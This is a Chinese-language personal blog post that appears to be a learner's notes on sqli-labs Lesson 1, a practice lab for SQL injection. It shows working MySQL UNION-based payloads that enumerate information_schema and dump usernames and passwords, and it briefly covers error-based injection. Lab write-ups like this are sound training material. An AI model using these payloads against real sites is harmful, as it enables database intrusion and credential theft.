<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="FLYapple">
    
    
    
    
    
    
    <title>sqli-labs_1 | Hexo</title>
    <link href="http://example.com" rel="prefetch" />

    
<link rel="stylesheet" href="/css/bootstrap.min.css">
<link rel="stylesheet" href="/css/aos.css">
<link rel="stylesheet" href="/css/style.css">

    
<script src="/js/jquery.min.js"></script>

    
<script src="/js/bootstrap.min.js"></script>

    
<script src="/js/aos.js"></script>

    
<script src="/js/highslide/highslide-full.min.js"></script>

    
<link rel="stylesheet" href="/js/highslide/highslide.css">

    <style type="text/css">
        @media (max-width: 768px) {
            body {
                background-color: #f0f0f0;
                background: url('/imgs/xsbg.gif');
                background-attachment: fixed;
            }
        }
    </style>
    
    <!--<script type="text/javascript">
      if (document.images) {
        var avatar = new Image();
        avatar.src = '/imgs/avatar.jpg'
        var previews = 'preview1.jpg,preview2.jpg,preview3.jpg,preview4.jpg'.split(',')
        var previewsPreLoad = []
        for(var i = 0; i < length; i++) {
          previewsPreLoad.push(new Image())
          previewsPreLoad[previewsPreLoad.length - 1].src = '/imgs/preview' + previews[i]
        }
      }
    </script>-->
<meta name="generator" content="Hexo 5.4.1"></head>
<body>
    <!-- 背景轮播图功能 -->
    <section class="hidden-xs">
    <ul class="cb-slideshow">
        <li><span>天若</span></li>
        <li><span>有情</span></li>
        <li><span>天亦老</span></li>
        <li><span>我为</span></li>
        <li><span>长者</span></li>
        <li><span>续一秒</span></li>
    </ul>
</section>
    <!-- 欧尼酱功能, 谁用谁知道 -->
    
    <header class="navbar navbar-inverse" id="gal-header">
    <div class="container">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle collapsed"
                    data-toggle="collapse" data-target=".bs-navbar-collapse"
                    aria-expanded="false">
                <span class="fa fa-lg fa-reorder"></span>
            </button>
            <a href="http://example.com">
                
                <style>
                    #gal-header .navbar-brand {
                        height: 54px;
                        line-height: 24px;
                        font-size: 28px;
                        opacity: 1;
                        background-color: rgba(0,0,0,0);
                        text-shadow: 0 0 5px #fff,0 0 10px #fff,0 0 15px #fff,0 0 20px #228DFF,0 0 35px #228DFF,0 0 40px #228DFF,0 0 50px #228DFF,0 0 75px #228DFF;
                    }
                </style>
                <!-- 这里使用文字(navbar_text or config.title) -->
                <div class="navbar-brand">Hexo</div>
                
            </a>
        </div>
        <div class="collapse navbar-collapse bs-navbar-collapse">
            <ul class="nav navbar-nav" id="menu-gal">
                
                
                <li class="">
                    <a href="/">
                        <i class="fa fa-home"></i>首页
                    </a>
                </li>
                
                
                
                <li class="">
                    <a href="/archives">
                        <i class="fa fa-archive"></i>归档
                    </a>
                </li>
                
                
                
                
                <li class="">
                    <a href="/categories">
                        <i class="fa fa-list"></i>分类
                    </a>
                </li>
                
                
                
                
                
                <li class="">
                    <a href="/tags">
                        <i class="fa fa-tags"></i>标签
                    </a>
                </li>
                
                
                
                
                <li class="">
                    <a href="/about">
                        <i class="fa fa-user"></i>关于我
                    </a>
                </li>
                
                
            </ul>
        </div>
    </div>
</header>
    <div id="gal-body">
        <div class="container">
            <div class="row">
                <div class="col-md-8 gal-right" id="mainstay">
                    
<article class="article well article-body" id="article">
    <div class="breadcrumb">
        <i class="fa fa-home"></i>
        <a href="http://example.com">Hexo</a>
        >
        <span>sqli-labs_1</span>
    </div>
    <!-- 大型设备详细文章 -->
    <div class="hidden-xs">
        <div class="title-article">
            <h1>
                <a href="/2022/03/22/sqli-labs-1/">sqli-labs_1</a>
            </h1>
        </div>
        <div class="tag-article">
            
            <span class="label label-gal">
                <i class="fa fa-calendar"></i> 2022-03-22
            </span>
            
        </div>
    </div>
    <!-- 小型设备详细文章 -->
    <div class="visible-xs">
        <center>
            <div class="title-article">
                <h4>
                    <a href="/2022/03/22/sqli-labs-1/">sqli-labs_1</a>
                </h4>
            </div>
            <p>
                <i class="fa fa-calendar"></i> 2022-03-22
            </p>
            <p>
                
                
            </p>
        </center>
    </div>
    <div class="content-article">
        <h1 id="sqli-labs-t1"><a href="#sqli-labs-t1" class="headerlink" title="sqli-labs-t1"></a>sqli-labs-t1</h1><h2 id="union联合注入方法"><a href="#union联合注入方法" class="headerlink" title="union联合注入方法"></a>union联合注入方法</h2><h3 id="一、观察题目"><a href="#一、观察题目" class="headerlink" title="一、观察题目"></a>一、观察题目</h3><p><img src="/2022/03/22/sqli-labs-1/image-20220322194233071.png" alt="image-20220322194233071"></p>
<p>提示写了“Please input the ID as parameter with numeric value”，因此尝试使用GET方法上传id数值，首先尝试id&#x3D;1，结果如下</p>
<p><img src="/2022/03/22/sqli-labs-1/image-20220322194729584.png" alt="image-20220322194729584"></p>
<p>之后尝试id&#x3D;2，3，4</p>
<p><img src="/2022/03/22/sqli-labs-1/image-20220322194810700.png" alt="image-20220322194810700"></p>
<p><img src="/2022/03/22/sqli-labs-1/image-20220322194832430.png" alt="image-20220322194832430"></p>
<h2 id="二、尝试寻找注入点"><a href="#二、尝试寻找注入点" class="headerlink" title="二、尝试寻找注入点"></a>二、尝试寻找注入点</h2><p>尝试使用id&#x3D;1 and 1&#x3D;1 # 和 id&#x3D;1 and 1&#x3D;2 # 判断是否有整形注入点</p>
<p><img src="/2022/03/22/sqli-labs-1/image-20220322203130849.png" alt="image-20220322203130849"><img src="/2022/03/22/sqli-labs-1/image-20220322203147030.png" alt="image-20220322203147030"></p>
<p>发现编译正常，无整型注入点</p>
<p>尝试使用id&#x3D;1’ and 1&#x3D;1 # 和 id&#x3D;1’ and 1&#x3D;2# 判断是否有字符型注入点</p>
<p><img src="/2022/03/22/sqli-labs-1/image-20220322203230499.png" alt="image-20220322203230499"></p>
<p>发现出现报错信息，根据报错可知为MySQL数据库，且存在字符型注入点。</p>
<p><strong>注：–+和#均为注释符，可以进行末尾注释，但#在url中作为锚点（？） 不能当作数据进行传输，因此会出现报错，不能正常执行。可以使用url编码替换（%23）</strong></p>
<p><strong>注2：本题可以用单引号进行”注释“</strong></p>
<p>参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/impulse-/p/13184023.html">SQL注入注释符(#、– 、&#x2F;**&#x2F;)使用条件及其他注释方式的探索 - impulse- - 博客园 </a></p>
<h2 id="三、查找表的结构信息"><a href="#三、查找表的结构信息" class="headerlink" title="三、查找表的结构信息"></a>三、查找表的结构信息</h2><p>首先测试该数据库的元素个数，使用order by [数字] 进行测试</p>
<p>提交</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&#x27; order by [数字]</span><br></pre></td></tr></table></figure>

<p>1，2，3都正常，当为4时报错，说明网页所调用表仅有3个属性</p>
<p><img src="/2022/03/22/sqli-labs-1/image-20220323121046022.png" alt="image-20220323121046022"></p>
<p>之后进行输出测试，查看网页输出对应属性</p>
<p>提交</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=-1&#x27; union select 1,2,3 --+</span><br></pre></td></tr></table></figure>

<p>由此可以看出，此页面查询可返回三个结果，其中只显示属性2，3。大致推测是索引、用户名、密码。</p>
<p><img src="/2022/03/22/sqli-labs-1/image-20220323121300764.png" alt="image-20220323121300764"></p>
<p>知道如何输出有用信息后，查询数据库名</p>
<p>提交</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=-1&#x27; union select 1,database(),3 --+</span><br></pre></td></tr></table></figure>

<p>可知数据库名为security</p>
<p><img src="/2022/03/22/sqli-labs-1/image-20220323121903915.png" alt="image-20220323121903915"></p>
<p>接下来利用information_schema表对所有结构进行查询。</p>
<p><strong>注：关于information_schema表的主要内容参考<a target="_blank" rel="noopener" href="https://blog.csdn.net/kikajack/article/details/80065753">MySQL 中的 information_schema 数据库_kikajack的博客-CSDN博客_information_schema</a></strong></p>
<p>从schemata表中可查询所有数据库名称</p>
<p>提交</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=-1&#x27; union select 1,group_concat(schema_name),3 from information_schema.schemata --+</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/22/sqli-labs-1/image-20220323143646340.png" alt="image-20220323143646340"></p>
<p>查询目标security数据库中table信息</p>
<p>首先查询表名</p>
<p>提交</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=-1&#x27; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#x27;security&#x27; --+</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/22/sqli-labs-1/image-20220323144116593.png" alt="image-20220323144116593"></p>
<p>需要寻找的用户信息应当在user表中，因此通过columns表对users表结构进行查询</p>
<p>提交</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=-1&#x27; union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&#x27;users&#x27; --+</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/22/sqli-labs-1/image-20220323144954165.png" alt="image-20220323144954165"></p>
<p>得知该表属性名称即可开始查询用户名和密码</p>
<p>提交</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=-1&#x27; union select 1,group_concat(username,&#x27;:&#x27;,password),3 from users --+</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/22/sqli-labs-1/image-20220323145803925.png" alt="image-20220323145803925"></p>
<p>完成提取</p>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><h3 id="xml报错"><a href="#xml报错" class="headerlink" title="xml报错"></a>xml报错</h3><p>关于extractvalue()和updatexml()的详细解释在<a target="_blank" rel="noopener" href="https://blog.csdn.net/zpy1998zpy/article/details/80631036">学习基于extractvalue()和updatexml()的报错注入_A1ienX的博客-CSDN博客_updatexml</a>中可以学习。</p>
<p>extractvalue(str1,str2)是查询xml元素的函数，其中str1是一个目标xml标签，str2是xml文档路径。当路径标签不合规范时会报错并显示其中内容。<em>（对其中为什么能够执行sql语句暂不理解）</em></p>
<p>updatexml(str1,str2,str3)是更新xml标签函数，str1和str2同上，str3为更新内容。报错方式同上。</p>
<p>具体查询步骤与union相同此处不再一一赘述。此处以extractvalue演示最终结果。</p>
<p><img src="/2022/03/22/sqli-labs-1/image-20220323155715334.png" alt="image-20220323155715334"></p>
<h3 id="floor报错"><a href="#floor报错" class="headerlink" title="floor报错"></a>floor报错</h3><p>floor报错的相关知识可以在<a target="_blank" rel="noopener" href="https://www.cnblogs.com/litlife/p/8472323.html">Floor报错原理分析 - ka1n4t - 博客园 (cnblogs.com)</a>进行学习</p>
<p>但未能实现例句。原因目前不明。</p>
<p><img src="/2022/03/22/sqli-labs-1/image-20220323165836074.png" alt="image-20220323165836074"></p>

    </div>
</article>


                </div>
                <aside class="col-md-4 gal-left" id="sidebar">
    <!-- 此为sidebar的搜索框, 非搜索结果页面 -->
<aside id="sidebar-search">
    <div class="search hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <form class="form-inline clearfix" id="search-form" method="get"
              action="/search/index.html">
            <input type="text" name="s" class="form-control" id="searchInput" placeholder="搜索文章~" autocomplete="off">
            <button class="btn btn-danger btn-gal" type="submit">
                <i class="fa fa-search"></i>
            </button>
        </form>
    </div>
</aside>
    <aside id="sidebar-author">
    <div class="panel panel-gal" data-aos="flip-right" data-aos-duration="3000">
        <div class="panel-heading" style="text-align: center">
            <i class="fa fa-quote-left"></i>
            FLYapple
            <i class="fa fa-quote-right"></i>
        </div>
        <div class="author-panel text-center">
            <img src="/imgs/avatar.jpg" width="140" height="140"
                 alt="个人头像" class="author-image">
            <p class="author-description"></p>
        </div>
    </div>
</aside>
    
    <aside id="sidebar-recent_comments">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-comments"></i>
            最新评论
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush"></ul>
    </div>
</aside>
    
    <!-- 要配置好leancloud才能开启此小工具 -->
    
    
    <aside id="sidebar-recent_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            近期文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/04/01/sqli-labs-20/">sqli-labs-20</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/04/01/sqli-labs-19/">sqli-labs-19</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/04/01/sqli-labs-18/">sqli-labs-18</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/31/sqli-labs-17/">sqli-labs-17</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/31/sqli-labs-14/">sqli-labs-14</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/31/sqli-labs-11/">sqli-labs-11</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/30/sqli-labs-7/">sqli-labs-7</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/30/sqli-labs-6/">sqli-labs-6</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/30/sqli-labs-5/">sqli-labs-5</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/30/sqli-labs-4/">sqli-labs-4</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="sidebar-rand_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            随机文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/22/sqli-labs-1/">sqli-labs_1</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/23/sqli-labs-2/">sqli-labs_2</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/23/sqli-labs-3/">sqli-labs_3</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/31/sqli-labs-11/">sqli-labs-11</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/31/sqli-labs-17/">sqli-labs-17</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/31/sqli-labs-14/">sqli-labs-14</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/30/sqli-labs-5/">sqli-labs-5</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/03/30/sqli-labs-6/">sqli-labs-6</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/04/01/sqli-labs-19/">sqli-labs-19</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2022/04/01/sqli-labs-20/">sqli-labs-20</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="gal-sets">
        <div class="panel panel-gal hidden-xs" data-aos="fade-up" data-aos-duration="2000">
            <ul class="nav nav-pills pills-gal">

                
                <li>
                    <a href="/2022/03/22/sqli-labs-1/index.html#sidebar-tags" data-toggle="tab" id="tags-tab">热门标签</a>
                </li>
                
                
                <li>
                    <a href="/2022/03/22/sqli-labs-1/index.html#sidebar-friend-links" data-toggle="tab" id="friend-links-tab">友情链接</a>
                </li>
                
                
                <li>
                    <a href="/2022/03/22/sqli-labs-1/index.html#sidebar-links" data-toggle="tab" id="links-tab">个人链接</a>
                </li>
                
            </ul>
            <div class="tab-content">
                
                <div class="cloud-tags tab-pane nav bs-sidenav fade" id="sidebar-tags">
    
</div>
                
                
                <div class="friend-links tab-pane nav bs-sidenav fade" id="sidebar-friend-links">
    
    <li>
        <a href="http://kdays.net/days/" target="_blank">KDays Forum</a>
    </li>
    
    <li>
        <a href="http://www.gal123.com/" target="_blank">ElderRing</a>
    </li>
    
    <li>
        <a href="http://www.moe123.com/" target="_blank">萌导航</a>
    </li>
    
</div>
                
                
                <div class="links tab-pane nav bs-sidenav fade" id="sidebar-links">
    
    <li>
        <a href="https://github.com/ZEROKISEKI/" target="_blank">Github</a>
    </li>
    
    <li>
        <a href="https://coding.net/u/SORA1" target="_blank">Coding</a>
    </li>
    
    <li>
        <a href="https://www.zhihu.com/people/aonosora/activities" target="_blank">知乎</a>
    </li>
    
</div>
                
            </div>
        </div>
    </aside>
    
</aside>
            </div>
        </div>
    </div>
    <footer id="gal-footer">
    <div class="container">
        Copyright © 2018 FLYapple Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>.&nbsp;Theme by <a href="https://github.com/ZEROKISEKI" target="_blank">AONOSORA</a>
    </div>
</footer>

<!-- 回到顶端 -->
<div id="gal-gotop">
    <i class="fa fa-angle-up"></i>
</div>
</body>

<script src="/js/activate-power-mode.js"></script>

<script>

    // 配置highslide
	hs.graphicsDir = '/js/highslide/graphics/'
    hs.outlineType = "rounded-white";
    hs.dimmingOpacity = 0.8;
    hs.outlineWhileAnimating = true;
    hs.showCredits = false;
    hs.captionEval = "this.thumb.alt";
    hs.numberPosition = "caption";
    hs.align = "center";
    hs.transitions = ["expand", "crossfade"];
    hs.lang.number = '共%2张图, 当前是第%1张';
    hs.addSlideshow({
      interval: 5000,
      repeat: true,
      useControls: true,
      fixedControls: "fit",
      overlayOptions: {
        opacity: 0.75,
        position: "bottom center",
        hideOnMouseOut: true
      }
    })

    // 初始化aos
    AOS.init({
      duration: 1000,
      delay: 0,
      easing: 'ease-out-back'
    });

</script>
<script>
	POWERMODE.colorful = 'true';    // make power mode colorful
	POWERMODE.shake = 'true';       // turn off shake
	// TODO 这里根据具体情况修改
	document.body.addEventListener('input', POWERMODE);
</script>
<script>
    window.slideConfig = {
      prefix: '/imgs/slide/background',
      ext: 'jpg',
      maxCount: '6'
    }
</script>

<script src="/js/hs.js"></script>
<script src="/js/blog.js"></script>




</html>